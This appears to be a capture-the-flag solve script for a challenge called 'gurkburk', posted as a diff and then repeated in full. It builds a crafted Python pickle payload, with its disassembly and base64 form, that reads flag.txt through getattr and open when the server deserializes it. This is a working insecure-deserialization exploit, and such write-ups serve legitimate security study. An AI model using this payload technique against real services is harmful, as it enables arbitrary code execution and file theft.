strellic · April 10, 2021 17:07
diff --git a/gurkburk.py b/gurkburk.py
 import pickle
 import base64
 import pickletools

 # basically, modify the pickle given to us by the challenge to include a note that comes from getattr(open("flag.txt"), "read")()
 payload = b'ccopy_reg\n_reconstructor\np0\n(c__main__\nNotes\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nVname\np6\nVMy notes\np7\nsVnotes\np8\n(lp9\nc__builtin__\ngetattr\n(c__builtin__\nopen\n(Vflag.txt\ntRp10\nVread\ntR)Rp11\nasb.'

 # pickletools.dis(payload)
 '''
    0: c    GLOBAL     'copy_reg _reconstructor'
   25: p    PUT        0
   28: (    MARK
   29: c        GLOBAL     '__main__ Notes'
   45: p        PUT        1
   48: c        GLOBAL     '__builtin__ object'
   68: p        PUT        2
   71: N        NONE
   72: t        TUPLE      (MARK at 28)
   73: p    PUT        3
   76: R    REDUCE
   77: p    PUT        4
   80: (    MARK
   81: d        DICT       (MARK at 80)
   82: p    PUT        5
   85: V    UNICODE    'name'
   91: p    PUT        6
   94: V    UNICODE    'My notes'
  104: p    PUT        7
  107: s    SETITEM
  108: V    UNICODE    'notes'
  115: p    PUT        8
  118: (    MARK
  119: l        LIST       (MARK at 118)
  120: p    PUT        9
  123: c    GLOBAL     '__builtin__ getattr'
  144: (    MARK
  145: c        GLOBAL     '__builtin__ open'
  163: (        MARK
  164: V            UNICODE    'flag.txt'
  174: t            TUPLE      (MARK at 163)
  175: R        REDUCE
  176: p        PUT        10
  180: V        UNICODE    'read'
  186: t        TUPLE      (MARK at 144)
  187: R    REDUCE
  188: )    EMPTY_TUPLE
  189: R    REDUCE
  190: p    PUT        11
  194: a    APPEND
  195: s    SETITEM
  196: b    BUILD
  197: .    STOP
  '''
  
 print(base64.b64encode(payload))
 # b'Y2NvcHlfcmVnCl9yZWNvbnN0cnVjdG9yCnAwCihjX19tYWluX18KTm90ZXMKcDEKY19fYnVpbHRpbl9fCm9iamVjdApwMgpOdHAzClJwNAooZHA1ClZuYW1lCnA2ClZNeSBub3RlcwpwNwpzVm5vdGVzCnA4CihscDkKY19fYnVpbHRpbl9fCmdldGF0dHIKKGNfX2J1aWx0aW5fXwpvcGVuCihWZmxhZy50eHQKdFJwMTAKVnJlYWQKdFIpUnAxMQphc2Iu'
	import pickle
	import base64
	import pickletools

	# basically, modify the pickle given to us by the challenge to include a note that comes from getattr(open("flag.txt"), "read")()
	payload = b'ccopy_reg\n_reconstructor\np0\n(c__main__\nNotes\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nVname\np6\nVMy notes\np7\nsVnotes\np8\n(lp9\nc__builtin__\ngetattr\n(c__builtin__\nopen\n(Vflag.txt\ntRp10\nVread\ntR)Rp11\nasb.'

	# pickletools.dis(payload)
	'''
	0: c GLOBAL 'copy_reg _reconstructor'
	25: p PUT 0
	28: ( MARK
	29: c GLOBAL '__main__ Notes'
	45: p PUT 1
	48: c GLOBAL '__builtin__ object'
	68: p PUT 2
	71: N NONE
	72: t TUPLE (MARK at 28)
	73: p PUT 3
	76: R REDUCE
	77: p PUT 4
	80: ( MARK
	81: d DICT (MARK at 80)
	82: p PUT 5
	85: V UNICODE 'name'
	91: p PUT 6
	94: V UNICODE 'My notes'
	104: p PUT 7
	107: s SETITEM
	108: V UNICODE 'notes'
	115: p PUT 8
	118: ( MARK
	119: l LIST (MARK at 118)
	120: p PUT 9
	123: c GLOBAL '__builtin__ getattr'
	144: ( MARK
	145: c GLOBAL '__builtin__ open'
	163: ( MARK
	164: V UNICODE 'flag.txt'
	174: t TUPLE (MARK at 163)
	175: R REDUCE
	176: p PUT 10
	180: V UNICODE 'read'
	186: t TUPLE (MARK at 144)
	187: R REDUCE
	188: ) EMPTY_TUPLE
	189: R REDUCE
	190: p PUT 11
	194: a APPEND
	195: s SETITEM
	196: b BUILD
	197: . STOP
	'''

	print(base64.b64encode(payload))
	# b'Y2NvcHlfcmVnCl9yZWNvbnN0cnVjdG9yCnAwCihjX19tYWluX18KTm90ZXMKcDEKY19fYnVpbHRpbl9fCm9iamVjdApwMgpOdHAzClJwNAooZHA1ClZuYW1lCnA2ClZNeSBub3RlcwpwNwpzVm5vdGVzCnA4CihscDkKY19fYnVpbHRpbl9fCmdldGF0dHIKKGNfX2J1aWx0aW5fXwpvcGVuCihWZmxhZy50eHQKdFJwMTAKVnJlYWQKdFIpUnAxMQphc2Iu'